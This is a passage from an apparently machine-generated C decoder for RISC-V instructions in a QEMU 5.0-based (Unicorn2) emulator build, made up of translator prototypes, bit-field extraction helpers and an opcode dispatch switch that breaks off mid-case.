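 * Every trans_* prototype in this file must be satisfied by the
 * translator proper; in this tree the implementations are pulled into
 * translate.c from target/riscv/insn_trans/trans_*.inc.c.  As a rough
 * sketch of their shape (simplified from the upstream QEMU 5.0 RV32I
 * handlers, where gen_arith is the shared helper that loads the source
 * registers, applies the given TCG op, and writes rd):
 *
 *     static bool trans_add(DisasContext *ctx, arg_add *a)
 *     {
 *         return gen_arith(ctx, a, &tcg_gen_add_tl);
 *     }
 *
 * Returning true marks the instruction as successfully translated;
 * returning false makes the decoder return false so the caller can
 * raise an illegal-instruction exception.
 */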
static bool trans_remu(DisasContext *ctx, arg_remu *a); typedef arg_atomic arg_lr_w; static bool trans_lr_w(DisasContext *ctx, arg_lr_w *a); typedef arg_atomic arg_sc_w; static bool trans_sc_w(DisasContext *ctx, arg_sc_w *a); typedef arg_atomic arg_amoswap_w; static bool trans_amoswap_w(DisasContext *ctx, arg_amoswap_w *a); typedef arg_atomic arg_amoadd_w; static bool trans_amoadd_w(DisasContext *ctx, arg_amoadd_w *a); typedef arg_atomic arg_amoxor_w; static bool trans_amoxor_w(DisasContext *ctx, arg_amoxor_w *a); typedef arg_atomic arg_amoand_w; static bool trans_amoand_w(DisasContext *ctx, arg_amoand_w *a); typedef arg_atomic arg_amoor_w; static bool trans_amoor_w(DisasContext *ctx, arg_amoor_w *a); typedef arg_atomic arg_amomin_w; static bool trans_amomin_w(DisasContext *ctx, arg_amomin_w *a); typedef arg_atomic arg_amomax_w; static bool trans_amomax_w(DisasContext *ctx, arg_amomax_w *a); typedef arg_atomic arg_amominu_w; static bool trans_amominu_w(DisasContext *ctx, arg_amominu_w *a); typedef arg_atomic arg_amomaxu_w; static bool trans_amomaxu_w(DisasContext *ctx, arg_amomaxu_w *a); typedef arg_i arg_flw; static bool trans_flw(DisasContext *ctx, arg_flw *a); typedef arg_s arg_fsw; static bool trans_fsw(DisasContext *ctx, arg_fsw *a); typedef arg_decode_insn3210 arg_fmadd_s; static bool trans_fmadd_s(DisasContext *ctx, arg_fmadd_s *a); typedef arg_decode_insn3210 arg_fmsub_s; static bool trans_fmsub_s(DisasContext *ctx, arg_fmsub_s *a); typedef arg_decode_insn3210 arg_fnmsub_s; static bool trans_fnmsub_s(DisasContext *ctx, arg_fnmsub_s *a); typedef arg_decode_insn3210 arg_fnmadd_s; static bool trans_fnmadd_s(DisasContext *ctx, arg_fnmadd_s *a); typedef arg_decode_insn3211 arg_fadd_s; static bool trans_fadd_s(DisasContext *ctx, arg_fadd_s *a); typedef arg_decode_insn3211 arg_fsub_s; static bool trans_fsub_s(DisasContext *ctx, arg_fsub_s *a); typedef arg_decode_insn3211 arg_fmul_s; static bool trans_fmul_s(DisasContext *ctx, arg_fmul_s *a); typedef arg_decode_insn3211 arg_fdiv_s; static bool trans_fdiv_s(DisasContext *ctx, arg_fdiv_s *a); typedef arg_decode_insn3212 arg_fsqrt_s; static bool trans_fsqrt_s(DisasContext *ctx, arg_fsqrt_s *a); typedef arg_r arg_fsgnj_s; static bool trans_fsgnj_s(DisasContext *ctx, arg_fsgnj_s *a); typedef arg_r arg_fsgnjn_s; static bool trans_fsgnjn_s(DisasContext *ctx, arg_fsgnjn_s *a); typedef arg_r arg_fsgnjx_s; static bool trans_fsgnjx_s(DisasContext *ctx, arg_fsgnjx_s *a); typedef arg_r arg_fmin_s; static bool trans_fmin_s(DisasContext *ctx, arg_fmin_s *a); typedef arg_r arg_fmax_s; static bool trans_fmax_s(DisasContext *ctx, arg_fmax_s *a); typedef arg_decode_insn3212 arg_fcvt_w_s; static bool trans_fcvt_w_s(DisasContext *ctx, arg_fcvt_w_s *a); typedef arg_decode_insn3212 arg_fcvt_wu_s; static bool trans_fcvt_wu_s(DisasContext *ctx, arg_fcvt_wu_s *a); typedef arg_decode_insn3213 arg_fmv_x_w; static bool trans_fmv_x_w(DisasContext *ctx, arg_fmv_x_w *a); typedef arg_r arg_feq_s; static bool trans_feq_s(DisasContext *ctx, arg_feq_s *a); typedef arg_r arg_flt_s; static bool trans_flt_s(DisasContext *ctx, arg_flt_s *a); typedef arg_r arg_fle_s; static bool trans_fle_s(DisasContext *ctx, arg_fle_s *a); typedef arg_decode_insn3213 arg_fclass_s; static bool trans_fclass_s(DisasContext *ctx, arg_fclass_s *a); typedef arg_decode_insn3212 arg_fcvt_s_w; static bool trans_fcvt_s_w(DisasContext *ctx, arg_fcvt_s_w *a); typedef arg_decode_insn3212 arg_fcvt_s_wu; static bool trans_fcvt_s_wu(DisasContext *ctx, arg_fcvt_s_wu *a); typedef arg_decode_insn3213 arg_fmv_w_x; 
static bool trans_fmv_w_x(DisasContext *ctx, arg_fmv_w_x *a); typedef arg_i arg_fld; static bool trans_fld(DisasContext *ctx, arg_fld *a); typedef arg_s arg_fsd; static bool trans_fsd(DisasContext *ctx, arg_fsd *a); typedef arg_decode_insn3210 arg_fmadd_d; static bool trans_fmadd_d(DisasContext *ctx, arg_fmadd_d *a); typedef arg_decode_insn3210 arg_fmsub_d; static bool trans_fmsub_d(DisasContext *ctx, arg_fmsub_d *a); typedef arg_decode_insn3210 arg_fnmsub_d; static bool trans_fnmsub_d(DisasContext *ctx, arg_fnmsub_d *a); typedef arg_decode_insn3210 arg_fnmadd_d; static bool trans_fnmadd_d(DisasContext *ctx, arg_fnmadd_d *a); typedef arg_decode_insn3211 arg_fadd_d; static bool trans_fadd_d(DisasContext *ctx, arg_fadd_d *a); typedef arg_decode_insn3211 arg_fsub_d; static bool trans_fsub_d(DisasContext *ctx, arg_fsub_d *a); typedef arg_decode_insn3211 arg_fmul_d; static bool trans_fmul_d(DisasContext *ctx, arg_fmul_d *a); typedef arg_decode_insn3211 arg_fdiv_d; static bool trans_fdiv_d(DisasContext *ctx, arg_fdiv_d *a); typedef arg_decode_insn3212 arg_fsqrt_d; static bool trans_fsqrt_d(DisasContext *ctx, arg_fsqrt_d *a); typedef arg_r arg_fsgnj_d; static bool trans_fsgnj_d(DisasContext *ctx, arg_fsgnj_d *a); typedef arg_r arg_fsgnjn_d; static bool trans_fsgnjn_d(DisasContext *ctx, arg_fsgnjn_d *a); typedef arg_r arg_fsgnjx_d; static bool trans_fsgnjx_d(DisasContext *ctx, arg_fsgnjx_d *a); typedef arg_r arg_fmin_d; static bool trans_fmin_d(DisasContext *ctx, arg_fmin_d *a); typedef arg_r arg_fmax_d; static bool trans_fmax_d(DisasContext *ctx, arg_fmax_d *a); typedef arg_decode_insn3212 arg_fcvt_s_d; static bool trans_fcvt_s_d(DisasContext *ctx, arg_fcvt_s_d *a); typedef arg_decode_insn3212 arg_fcvt_d_s; static bool trans_fcvt_d_s(DisasContext *ctx, arg_fcvt_d_s *a); typedef arg_r arg_feq_d; static bool trans_feq_d(DisasContext *ctx, arg_feq_d *a); typedef arg_r arg_flt_d; static bool trans_flt_d(DisasContext *ctx, arg_flt_d *a); typedef arg_r arg_fle_d; static bool trans_fle_d(DisasContext *ctx, arg_fle_d *a); typedef arg_decode_insn3213 arg_fclass_d; static bool trans_fclass_d(DisasContext *ctx, arg_fclass_d *a); typedef arg_decode_insn3212 arg_fcvt_w_d; static bool trans_fcvt_w_d(DisasContext *ctx, arg_fcvt_w_d *a); typedef arg_decode_insn3212 arg_fcvt_wu_d; static bool trans_fcvt_wu_d(DisasContext *ctx, arg_fcvt_wu_d *a); typedef arg_decode_insn3212 arg_fcvt_d_w; static bool trans_fcvt_d_w(DisasContext *ctx, arg_fcvt_d_w *a); typedef arg_decode_insn3212 arg_fcvt_d_wu; static bool trans_fcvt_d_wu(DisasContext *ctx, arg_fcvt_d_wu *a); typedef arg_i arg_lwu; static bool trans_lwu(DisasContext *ctx, arg_lwu *a); typedef arg_i arg_ld; static bool trans_ld(DisasContext *ctx, arg_ld *a); typedef arg_s arg_sd; static bool trans_sd(DisasContext *ctx, arg_sd *a); typedef arg_i arg_addiw; static bool trans_addiw(DisasContext *ctx, arg_addiw *a); typedef arg_shift arg_slliw; static bool trans_slliw(DisasContext *ctx, arg_slliw *a); typedef arg_shift arg_srliw; static bool trans_srliw(DisasContext *ctx, arg_srliw *a); typedef arg_shift arg_sraiw; static bool trans_sraiw(DisasContext *ctx, arg_sraiw *a); typedef arg_r arg_addw; static bool trans_addw(DisasContext *ctx, arg_addw *a); typedef arg_r arg_subw; static bool trans_subw(DisasContext *ctx, arg_subw *a); typedef arg_r arg_sllw; static bool trans_sllw(DisasContext *ctx, arg_sllw *a); typedef arg_r arg_srlw; static bool trans_srlw(DisasContext *ctx, arg_srlw *a); typedef arg_r arg_sraw; static bool trans_sraw(DisasContext *ctx, arg_sraw *a); 
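/*
 * Everything in this block -- lwu/ld/sd, addiw and the *w shift and
 * arithmetic forms, the lr_d/sc_d/amo*_d atomics, and the fcvt_l_* and
 * fmv_x_d / fmv_d_x conversions below -- comes from insn32-64.decode
 * and therefore exists only in this riscv64 build of the decoder; the
 * riscv32 build generates the same file without these RV64-only
 * patterns.
 */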
typedef arg_r arg_mulw; static bool trans_mulw(DisasContext *ctx, arg_mulw *a); typedef arg_r arg_divw; static bool trans_divw(DisasContext *ctx, arg_divw *a); typedef arg_r arg_divuw; static bool trans_divuw(DisasContext *ctx, arg_divuw *a); typedef arg_r arg_remw; static bool trans_remw(DisasContext *ctx, arg_remw *a); typedef arg_r arg_remuw; static bool trans_remuw(DisasContext *ctx, arg_remuw *a); typedef arg_atomic arg_lr_d; static bool trans_lr_d(DisasContext *ctx, arg_lr_d *a); typedef arg_atomic arg_sc_d; static bool trans_sc_d(DisasContext *ctx, arg_sc_d *a); typedef arg_atomic arg_amoswap_d; static bool trans_amoswap_d(DisasContext *ctx, arg_amoswap_d *a); typedef arg_atomic arg_amoadd_d; static bool trans_amoadd_d(DisasContext *ctx, arg_amoadd_d *a); typedef arg_atomic arg_amoxor_d; static bool trans_amoxor_d(DisasContext *ctx, arg_amoxor_d *a); typedef arg_atomic arg_amoand_d; static bool trans_amoand_d(DisasContext *ctx, arg_amoand_d *a); typedef arg_atomic arg_amoor_d; static bool trans_amoor_d(DisasContext *ctx, arg_amoor_d *a); typedef arg_atomic arg_amomin_d; static bool trans_amomin_d(DisasContext *ctx, arg_amomin_d *a); typedef arg_atomic arg_amomax_d; static bool trans_amomax_d(DisasContext *ctx, arg_amomax_d *a); typedef arg_atomic arg_amominu_d; static bool trans_amominu_d(DisasContext *ctx, arg_amominu_d *a); typedef arg_atomic arg_amomaxu_d; static bool trans_amomaxu_d(DisasContext *ctx, arg_amomaxu_d *a); typedef arg_decode_insn3212 arg_fcvt_l_s; static bool trans_fcvt_l_s(DisasContext *ctx, arg_fcvt_l_s *a); typedef arg_decode_insn3212 arg_fcvt_lu_s; static bool trans_fcvt_lu_s(DisasContext *ctx, arg_fcvt_lu_s *a); typedef arg_decode_insn3212 arg_fcvt_s_l; static bool trans_fcvt_s_l(DisasContext *ctx, arg_fcvt_s_l *a); typedef arg_decode_insn3212 arg_fcvt_s_lu; static bool trans_fcvt_s_lu(DisasContext *ctx, arg_fcvt_s_lu *a); typedef arg_decode_insn3212 arg_fcvt_l_d; static bool trans_fcvt_l_d(DisasContext *ctx, arg_fcvt_l_d *a); typedef arg_decode_insn3212 arg_fcvt_lu_d; static bool trans_fcvt_lu_d(DisasContext *ctx, arg_fcvt_lu_d *a); typedef arg_decode_insn3213 arg_fmv_x_d; static bool trans_fmv_x_d(DisasContext *ctx, arg_fmv_x_d *a); typedef arg_decode_insn3212 arg_fcvt_d_l; static bool trans_fcvt_d_l(DisasContext *ctx, arg_fcvt_d_l *a); typedef arg_decode_insn3212 arg_fcvt_d_lu; static bool trans_fcvt_d_lu(DisasContext *ctx, arg_fcvt_d_lu *a); typedef arg_decode_insn3213 arg_fmv_d_x; static bool trans_fmv_d_x(DisasContext *ctx, arg_fmv_d_x *a); static void decode_insn32_extract_atom_ld(DisasContext *ctx, arg_atomic *a, uint32_t insn) { a->aq = extract32(insn, 26, 1); a->rl = extract32(insn, 25, 1); a->rs2 = 0; a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_atom_st(DisasContext *ctx, arg_atomic *a, uint32_t insn) { a->aq = extract32(insn, 26, 1); a->rl = extract32(insn, 25, 1); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_b(DisasContext *ctx, arg_b *a, uint32_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(extract32(insn, 8, 4), 4, 28, extract32(insn, 25, 6)), 10, 22, extract32(insn, 7, 1)), 11, 21, sextract32(insn, 31, 1))); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_csr(DisasContext *ctx, arg_decode_insn329 *a, uint32_t insn) { a->csr = extract32(insn, 20, 12); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void 
decode_insn32_extract_decode_insn32_Fmt_18(DisasContext *ctx, arg_empty *a, uint32_t insn) { } static void decode_insn32_extract_decode_insn32_Fmt_19(DisasContext *ctx, arg_decode_insn3216 *a, uint32_t insn) { a->pred = extract32(insn, 24, 4); a->succ = extract32(insn, 20, 4); } static void decode_insn32_extract_hfence_bvma(DisasContext *ctx, arg_decode_insn3214 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_hfence_gvma(DisasContext *ctx, arg_decode_insn3214 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_i(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = sextract32(insn, 20, 12); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_j(DisasContext *ctx, arg_j *a, uint32_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(extract32(insn, 21, 10), 10, 22, extract32(insn, 20, 1)), 11, 21, extract32(insn, 12, 8)), 19, 13, sextract32(insn, 31, 1))); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r(DisasContext *ctx, arg_r *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r2(DisasContext *ctx, arg_decode_insn3213 *a, uint32_t insn) { a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r2_rm(DisasContext *ctx, arg_decode_insn3212 *a, uint32_t insn) { a->rs1 = extract32(insn, 15, 5); a->rm = extract32(insn, 12, 3); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r4_rm(DisasContext *ctx, arg_decode_insn3210 *a, uint32_t insn) { a->rs3 = extract32(insn, 27, 5); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rm = extract32(insn, 12, 3); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r_rm(DisasContext *ctx, arg_decode_insn3211 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rm = extract32(insn, 12, 3); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_s(DisasContext *ctx, arg_s *a, uint32_t insn) { a->imm = deposit32(extract32(insn, 7, 5), 5, 27, sextract32(insn, 25, 7)); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_sfence_vm(DisasContext *ctx, arg_decode_insn3215 *a, uint32_t insn) { a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_sfence_vma(DisasContext *ctx, arg_decode_insn3214 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_sh(DisasContext *ctx, arg_shift *a, uint32_t insn) { a->shamt = extract32(insn, 20, 10); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_sh5(DisasContext *ctx, arg_shift *a, uint32_t insn) { a->shamt = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_u(DisasContext *ctx, arg_u *a, uint32_t insn) { a->imm = ex_shift_12(ctx, sextract32(insn, 12, 20)); a->rd = extract32(insn, 7, 5); } static bool decode_insn32(DisasContext *ctx, uint32_t insn) { union { arg_atomic f_atomic; arg_b f_b; arg_decode_insn3210 f_decode_insn3210; arg_decode_insn3211 f_decode_insn3211; arg_decode_insn3212 f_decode_insn3212; arg_decode_insn3213 f_decode_insn3213; arg_decode_insn3214 f_decode_insn3214; arg_decode_insn3215 
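/*
 * A given instruction word matches at most one pattern, so the
 * per-format argument structs can share storage in this union: each
 * case below first runs the decode_insn32_extract_*() routine for its
 * format to fill in the matching u.f_* member, then passes its address
 * to the corresponding trans_*() hook, whose boolean result is
 * propagated as the decode result.
 */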
f_decode_insn3215; arg_decode_insn3216 f_decode_insn3216; arg_decode_insn329 f_decode_insn329; arg_empty f_empty; arg_i f_i; arg_j f_j; arg_r f_r; arg_s f_s; arg_shift f_shift; arg_u f_u; } u; switch (insn & 0x0000007f) { case 0x00000003: /* ........ ........ ........ .0000011 */ decode_insn32_extract_i(ctx, &u.f_i, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:96 */ if (trans_lb(ctx, &u.f_i)) return true; return false; case 0x1: /* ........ ........ .001.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:97 */ if (trans_lh(ctx, &u.f_i)) return true; return false; case 0x2: /* ........ ........ .010.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:98 */ if (trans_lw(ctx, &u.f_i)) return true; return false; case 0x3: /* ........ ........ .011.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:28 */ if (trans_ld(ctx, &u.f_i)) return true; return false; case 0x4: /* ........ ........ .100.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:99 */ if (trans_lbu(ctx, &u.f_i)) return true; return false; case 0x5: /* ........ ........ .101.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:100 */ if (trans_lhu(ctx, &u.f_i)) return true; return false; case 0x6: /* ........ ........ .110.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:27 */ if (trans_lwu(ctx, &u.f_i)) return true; return false; } return false; case 0x00000007: /* ........ ........ ........ .0000111 */ decode_insn32_extract_i(ctx, &u.f_i, insn); switch ((insn >> 12) & 0x7) { case 0x2: /* ........ ........ .010.... .0000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:156 */ if (trans_flw(ctx, &u.f_i)) return true; return false; case 0x3: /* ........ ........ .011.... .0000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:184 */ if (trans_fld(ctx, &u.f_i)) return true; return false; } return false; case 0x0000000f: /* ........ ........ ........ .0001111 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:123 */ decode_insn32_extract_decode_insn32_Fmt_19(ctx, &u.f_decode_insn3216, insn); if (trans_fence(ctx, &u.f_decode_insn3216)) return true; return false; case 0x1: /* ........ ........ .001.... .0001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:124 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); if (trans_fence_i(ctx, &u.f_empty)) return true; return false; } return false; case 0x00000013: /* ........ ........ ........ .0010011 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:104 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x1: /* ........ ........ .001.... .0010011 */ decode_insn32_extract_sh(ctx, &u.f_shift, insn); switch ((insn >> 30) & 0x3) { case 0x0: /* 00...... ........ .001.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:110 */ if (trans_slli(ctx, &u.f_shift)) return true; return false; } return false; case 0x2: /* ........ ........ 
.010.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:105 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_slti(ctx, &u.f_i)) return true; return false; case 0x3: /* ........ ........ .011.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:106 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_sltiu(ctx, &u.f_i)) return true; return false; case 0x4: /* ........ ........ .100.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:107 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_xori(ctx, &u.f_i)) return true; return false; case 0x5: /* ........ ........ .101.... .0010011 */ decode_insn32_extract_sh(ctx, &u.f_shift, insn); switch ((insn >> 30) & 0x3) { case 0x0: /* 00...... ........ .101.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:111 */ if (trans_srli(ctx, &u.f_shift)) return true; return false; case 0x1: /* 01...... ........ .101.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:112 */ if (trans_srai(ctx, &u.f_shift)) return true; return false; } return false; case 0x6: /* ........ ........ .110.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:108 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_ori(ctx, &u.f_i)) return true; return false; case 0x7: /* ........ ........ .111.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:109 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_andi(ctx, &u.f_i)) return true; return false; } return false; case 0x00000017: /* ........ ........ ........ .0010111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:87 */ decode_insn32_extract_u(ctx, &u.f_u, insn); if (trans_auipc(ctx, &u.f_u)) return true; return false; case 0x0000001b: /* ........ ........ ........ .0011011 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0011011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:30 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_addiw(ctx, &u.f_i)) return true; return false; case 0x1: /* ........ ........ .001.... .0011011 */ decode_insn32_extract_sh5(ctx, &u.f_shift, insn); switch ((insn >> 25) & 0x7f) { case 0x0: /* 0000000. ........ .001.... .0011011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:31 */ if (trans_slliw(ctx, &u.f_shift)) return true; return false; } return false; case 0x5: /* ........ ........ .101.... .0011011 */ decode_insn32_extract_sh5(ctx, &u.f_shift, insn); switch ((insn >> 25) & 0x7f) { case 0x0: /* 0000000. ........ .101.... .0011011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:32 */ if (trans_srliw(ctx, &u.f_shift)) return true; return false; case 0x20: /* 0100000. ........ .101.... .0011011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:33 */ if (trans_sraiw(ctx, &u.f_shift)) return true; return false; } return false; } return false; case 0x00000023: /* ........ ........ ........ .0100011 */ decode_insn32_extract_s(ctx, &u.f_s, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:101 */ if (trans_sb(ctx, &u.f_s)) return true; return false; case 0x1: /* ........ ........ .001.... 
.0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:102 */ if (trans_sh(ctx, &u.f_s)) return true; return false; case 0x2: /* ........ ........ .010.... .0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:103 */ if (trans_sw(ctx, &u.f_s)) return true; return false; case 0x3: /* ........ ........ .011.... .0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:29 */ if (trans_sd(ctx, &u.f_s)) return true; return false; } return false; case 0x00000027: /* ........ ........ ........ .0100111 */ decode_insn32_extract_s(ctx, &u.f_s, insn); switch ((insn >> 12) & 0x7) { case 0x2: /* ........ ........ .010.... .0100111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:157 */ if (trans_fsw(ctx, &u.f_s)) return true; return false; case 0x3: /* ........ ........ .011.... .0100111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:185 */ if (trans_fsd(ctx, &u.f_s)) return true; return false; } return false; case 0x0000002f: /* ........ ........ ........ .0101111 */ switch (insn & 0xf8007000) { case 0x00002000: /* 00000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:146 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoadd_w(ctx, &u.f_atomic)) return true; return false; case 0x00003000: /* 00000... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:51 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoadd_d(ctx, &u.f_atomic)) return true; return false; case 0x08002000: /* 00001... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:145 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoswap_w(ctx, &u.f_atomic)) return true; return false; case 0x08003000: /* 00001... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:50 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoswap_d(ctx, &u.f_atomic)) return true; return false; case 0x10002000: /* 00010... ........ .010.... .0101111 */ decode_insn32_extract_atom_ld(ctx, &u.f_atomic, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 00010..0 0000.... .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:143 */ if (trans_lr_w(ctx, &u.f_atomic)) return true; return false; } return false; case 0x10003000: /* 00010... ........ .011.... .0101111 */ decode_insn32_extract_atom_ld(ctx, &u.f_atomic, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 00010..0 0000.... .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:48 */ if (trans_lr_d(ctx, &u.f_atomic)) return true; return false; } return false; case 0x18002000: /* 00011... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:144 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_sc_w(ctx, &u.f_atomic)) return true; return false; case 0x18003000: /* 00011... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:49 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_sc_d(ctx, &u.f_atomic)) return true; return false; case 0x20002000: /* 00100... ........ .010.... 
.0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:147 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoxor_w(ctx, &u.f_atomic)) return true; return false; case 0x20003000: /* 00100... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:52 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoxor_d(ctx, &u.f_atomic)) return true; return false; case 0x40002000: /* 01000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:149 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoor_w(ctx, &u.f_atomic)) return true; return false; case 0x40003000: /* 01000... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:54 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoor_d(ctx, &u.f_atomic)) return true; return false; case 0x60002000: /* 01100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:148 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoand_w(ctx, &u.f_atomic)) return true; return false; case 0x60003000: /* 01100... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:53 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoand_d(ctx, &u.f_atomic)) return true; return false; case 0x80002000: /* 10000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:150 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomin_w(ctx, &u.f_atomic)) return true; return false; case 0x80003000: /* 10000... ........ .011.... .0101111 */ /* 